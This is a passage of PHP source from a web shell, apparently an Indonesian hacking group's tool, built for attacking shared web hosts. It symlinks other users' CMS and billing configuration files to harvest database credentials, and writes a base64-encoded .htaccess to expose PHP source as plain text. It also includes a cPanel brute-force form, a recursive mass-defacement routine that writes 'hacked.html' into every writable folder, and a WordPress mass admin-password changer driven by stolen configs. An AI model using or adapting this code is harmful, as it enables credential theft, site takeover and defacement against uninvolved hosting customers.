715.                     symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
716.                     symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
717.                     symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
718.                     symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
719.                     symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
720.                     symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
721.                     symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
722.                     symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
723.                     symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
724.                     symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
725.                     symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
726.                     symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
727.                     symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
728.                     symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
729.                     symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
730.                     symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
731.                     symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
732.                     symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
733.                     symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
734.                     symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
735.                     symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
736.                     symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
737.                     symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
738.                     symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
739.                     symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
740.                     symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
741.                     symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
742.                     symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
743.                     symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
744.                     symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
745.                     symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
746.                     symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
747.                     symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
748.                     symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
749.                     symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
750.                     symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
751.                     symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
752.                     symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
753.                     symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
754.                     symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
755.                     symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
756.                     symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
757.                     symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
758.                     symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
759.                     symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
760.                     symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
761.                     symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
762.                     symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
763.                     symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
764.                     symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
765.                     symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
766.                     symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
767.                     symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
768.                     symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
769.                     symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
770.                     symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
771.                     symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
772.                     symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
773.                     symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
774.                     symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
775.                     symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
776.                     symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
777.                     symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
778.                     symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
779.                     symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
780.                     symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
781.                     symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
782.                     symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
783.                     symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
784.                     symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
785.                     symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
786.                     symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
787.                     symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
788.                     symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
789.                     symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
790.                     symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
791.                     symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
792.                     symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
793.                     symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
794.                     symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
795.                     symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
796.                     symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
797.                     symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
798.                     symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
799.                     symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
800.                     symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
801.                     symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
802.                     symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
803.                     symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
804.                     symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
805.                     symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
806.                     symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
807.                     symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
808.                     symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
809.                     symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
810.                     symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
811.                     symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
812.                     symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
813.                     symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
814.                     symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
815.                     symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
816.                     symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
817.                     symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
818.                     symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
819.                     symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
820.                     symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
821.                     symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
822.                     symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
823.                     symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
824.                     symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
825.                     symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
826.                     symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
827.                     symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
828.                     symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
829.                     symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
830.                     symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
831.                     symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
832.                     symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
833.                     symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
834.                     symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
835.                     symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
836.                     symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
837.                     symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
838.                     symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
839.                     symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
840.                     symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
841.                     symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
842.                     symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
843.                     symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
844.                     symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
845.                     symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
846.                     symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
847.                     symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
848.                     symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
849.                     symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
850.                     symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
851.                     symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
852.                     symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
853.                     symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
854.                     symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
855.                     symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
856.                     symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
857.                     symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
858.                     symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
859.                     symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
860.                     symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
861.                     symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
862.                     symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
863.                     symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
864.                     symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
865.                     symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
866.                     symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
867.                     symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
868.                     symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
869.                     symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
870.                     symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
871.                     symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
872.                     symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
873.                     symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
874.                     symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
875.                     symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
876.                     symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
877.                     symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
878.                     symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
879.                     symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
880.                     symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
881.                     symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
882.                     symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
883.                     symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
884.                     symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
885.                     symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
886.                     symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
887.                     symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
888.                     symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
889.                     symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
890.                     symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
891.                     symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
892.                     symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
893.                     symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
894.                     symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
895.                     symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
896.                     symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
897.                     symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
898.                 }
899.  
900.                             $d0mains = @file("/etc/named.conf");
901.                    
902.                             if($d0mains)
903.                             {
904.                                 mkdir($fn);
905.                                 chdir($fn);
906.                                                    
907.                                 foreach($d0mains as $d0main)
908.                                 {
909.                                     if(eregi("zone",$d0main))
910.                                     {
911.                                         preg_match_all('#zone "(.*)"#', $d0main, $domains);
912.                                         flush();
913.                                            
914.                                         if(strlen(trim($domains[1][0])) > 2)
915.                                         {
916.                                             $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
917.                                            
918.                                             syml($user['name'],$domains[1][0]);                
919.                                         }
920.                                     }
921.                                 }
922.                                 echo "<center><font color=springgreen size=3>Done</font></center>";
923.                                 echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
924.                             }
925.                             else
926.                             {
927.                                 mkdir($fn);
928.                                 chdir($fn);
929.                                 $temp = "";
930.                                 $val1 = 0;
931.                                 $val2 = 1000;
932.                                 for(;$val1 <= $val2;$val1++)
933.                                 {
934.                                     $uid = @posix_getpwuid($val1);
935.                                     if ($uid)
936.                                         $temp .= join(':',$uid)."\n";
937.                                  }
938.                                  echo '<br/>';
939.                                  $temp = trim($temp);
940.                                  
941.                                  $file5 = fopen("test.txt","w");
942.                                  fputs($file5,$temp);
943.                                  fclose($file5);
944.  
945.             $htaccess =
946.             'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
947.             aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
948.             biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
949.             ';
950.             $file = fopen(".htaccess","w+");
951.             $write = fwrite ($file ,base64_decode($htaccess));
952.                                  
953.                                  $file = fopen("test.txt", "r") or exit("Unable to open file!");
954.                                  while(!feof($file))
955.                                  {
956.                                     $s = fgets($file);
957.                                     $matches = array();
958.                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
959.                                     $matches = str_replace("home/","",$matches[1]);
960.                                     if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
961.                                         continue;
962.                                     syml($matches,$matches);
963.                                  }
964.                                 fclose($file);
965.                                 echo "</table>";
966.                                 unlink("test.txt");
967.                                 echo "<center><font color=springgreen size=3>Done</font></center>";
968.                                 echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
969.                             }
970.             echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
971.             exit;
972.             }
973.             ?>
974.             <form method="POST" target="_blank">
975.             <input name="page" type="hidden" value="find">
976.                 <table border=1>
977.                 <body bgcolor="black" text="white"><br><br>
978.                
979.                 <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
980.                 <tr>
981.                 <td>
982.                 <strong>User :</strong>
983.                 </td>
984.                 <td>
985.                 <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
986.                 </td>
987.                 <tr>
988.                 <td>
989.                 <strong>Pass :</strong>
990.                 </td>
991.                 <td>
992.                 <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="passwords"></textarea></strong>
993.                 </td>
994.                 </tr>
995.                 <tr>
996.                 <td>
997.                 <strong>Type :</strong>
998.                 </td>
999.                 <td>
1000.                 <span style="background:#191818;outline:none;color:white;"><strong>Simple : </strong> </span>
1001.                 <strong>
1002.                 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
1003.                 <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
1004.                 <strong>
1005.                 <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
1006.                 </strong>
1007.                 </span>
1008.                 <td style="background:black;outline:none;color:white;"  >
1009.                 <strong><input class ='bordergaya' type="submit" value="START"></strong>
1010.                 </td>
1011.                 </tr>
1012.                 </table>
1013.                 <br>
1014.                 <table border=1>
1015.             </form>  
1016.             <tr>
1017.                 <td style="background:black;outline:none;color:white;">
1018.                     <strong>Get Wordlist</strong>
1019.             <form method="POST" target="_blank">
1020.                 <strong>
1021.             <input name="pass" type="hidden" value="password">                     
1022.                 </strong>
1023.                 <strong>Url Config :</strong>
1024.                 <td>
1025.                    
1026.                 <strong>
1027.                     <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
1028.                
1029.                 <td style="background:black;outline:none;color:white;"><strong><input class ='bordergaya' type="submit" value="GO">
1030.                 </strong>
1031.                 </td>
1032.                 </table>
1033.                 <?php
1034.                 echo"<br/><br/>";
1035.                 break;
1036.             }
1037.                 elseif(isset($_GET['x']) && ($_GET['x'] == 'massde'))
1038.                 {
1039. ?></center></center>
1040. <style type="text/css">
1041.     .ketengah{
1042.     text-align: left;
1043.     font-size: 16px;
1044.     color: orange;
1045.     font-family: Homenaje;
1046.     margin-left: 30%;
1047. </style>
1048. <?php
1049. /*thanks To IndoXploit*/
1050. function sabun_massal($path,$namafile,$isi_script) {
1051.         if(is_writable($path)) {
1052.             $patha = scandir($path);
1053.             foreach($patha as $pathb) {
1054.                 $pathc = "$path/$pathb";
1055.                 $lokasi = $pathc.'/'.$namafile;
1056.                 if($pathb === '.') {
1057.                     file_put_contents($lokasi, $isi_script);
1058.                 } elseif($pathb === '..') {
1059.                     file_put_contents($lokasi, $isi_script);
1060.                 } else {
1061.                     if(is_dir($pathc)) {
1062.                         if(is_writable($pathc)) {
1063.                             echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>Sukses Bos Q</font><font color=crimson>-:-</font> <font color=springgreen>Cek di :</font> $lokasi</font><br>";
1064.                             file_put_contents($lokasi, $isi_script);
1065.                             $idx = sabun_massal($pathc,$namafile,$isi_script);
1066.                         }
1067.                     }
1068.                 }
1069.             }
1070.         }
1071.     }
1072.     if($_POST['start']) {
1073.         echo "<div style='margin: 5px auto; padding: 5px'>";
1074.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1075.         echo "</div>";
1076.     } else {
1077.     echo "<center>";
1078.     echo "<form method='post'><br><br>
1079.     <table>
1080.     <tr>
1081.         <td><font style='text-decoration: underline; margin-left:10px;'>Folder</font></td>
1082.         <td align='center'>:</td>
1083.         <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;' height='10'><br></td>
1084.     </tr>
1085.     <tr>
1086.         <td><font style='text-decoration: underline; margin-left:10px;'>Filename</font></td>
1087.         <td align='center'>:</td>
1088.         <td><input class='justborder' type='text' name='d_file' value='hacked.html' style='width: 95%;' height='10'><br></td>
1089.     </tr>
1090.     <tr>
1091.     <td colspan='3' align='center'><font style='text-decoration: underline;'>Script Deface : </font><br></td>
1092.     </tr>
1093.     <tr>
1094.     <td colspan='3'><textarea class='justborder' name='script' style='width: 500px; height: 200px;'>Hacked by Stupidc0de Family!</textarea><br></td>
1095.     </tr>
1096.     <tr>
1097.     <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;'><br/></td>
1098.     </tr>
1099.     </table><br><br><br>
1100.     </form></center><br/>";
1101.     }break;?><center><center><?php
1102. }
1103.                 elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc'))
1104.                 {
1105.                 ?>
1106.                 <form action="?path=<?php echo $path; ?>&amp;x=mpc" method="post">
1107.                 <?php
1108.             set_time_limit(0);
1109.             ini_set('display_errors', 0);
1110.              
1111.             echo '<center><h2>WordPress Mass Password Changer</h2><br /><br/></center>';
1112.             echo '<form method="POST" action="" >
1113.             <center><table border="1" class="justborder"><tr><td>Config List:</td>
1114.             <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
1115.             <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
1116.             <input class="justborder" type="text" name="password" size="25" value="stupidc0de"></td></tr></table>
1117.             <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
1118.              
1119.             if ($_POST['action']=='1'){
1120.             if ($_POST['url']==''){
1121.             echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
1122.             }else{
1123.             $url=$_POST['url'];
1124.             $users  = explode("\n",$url);
1125.             foreach ($users as $user) {
1126.             $user1=trim($user);
1127.             $code=file_get_contents2($user1);
1128.             preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
1129.             $db=$b1[1][0];
1130.             preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
1131.             $user=$b2[1][0];
1132.             preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
1133.             $db_password=$b3[1][0];
1134.             preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
1135.             $host=$b4[1][0];
1136.             preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
1137.             $p=$b5[1][0];
1138.              
1139.             $d=@mysql_connect( $host, $user, $db_password ) ;
1140.             if ($d){
1141.             @mysql_select_db($db );
1142.             $usern=$_POST['username'];
1143.             $passwd=$_POST['password'];
1144.             $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';";
1145.             @mysql_query($sql) ; ;
1146.             $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';";
1147.             @mysql_query($sql) ; ;
1148.             $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
1149.             $siteurl=@mysql_fetch_array($aa) ;
1150.             $siteurl=$siteurl['option_value'];
1151.             $tr.="$siteurl\n";
1152.             mysql_close();
1153.             }
1154.             }
1155.             if ($tr)
1156.             $filename = 'changed.txt';
1157.             $fp = fopen($filename, "a+");
1158.             $write = fputs($fp, $tr);
1159.             fclose($fp);
1160.             echo "<div class='result'>Password Changing Completed ! :)<br><br>";
1161.             echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
1162.  
1163.             }
1164.             }
1165.             function file_get_contents2($u){
1166.                     $ch = curl_init();
1167.                 curl_setopt($ch,CURLOPT_URL,$u);
1168.                     curl_setopt($ch, CURLOPT_HEADER, 0);    
1169.                curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
1170.                 curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
1171.                     $result = curl_exec($ch);
1172.                     return $result ;
1173.                     }
1174.                     echo "<br /><br />";
1175.                     break;
1176.                     ?>
1177.                 <?php }
1178.         elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool'))
1179.         {
1180.                     echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1181.                     ?>
1182.                     <a href="?<?php echo "path=".$path; ?>&amp;x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
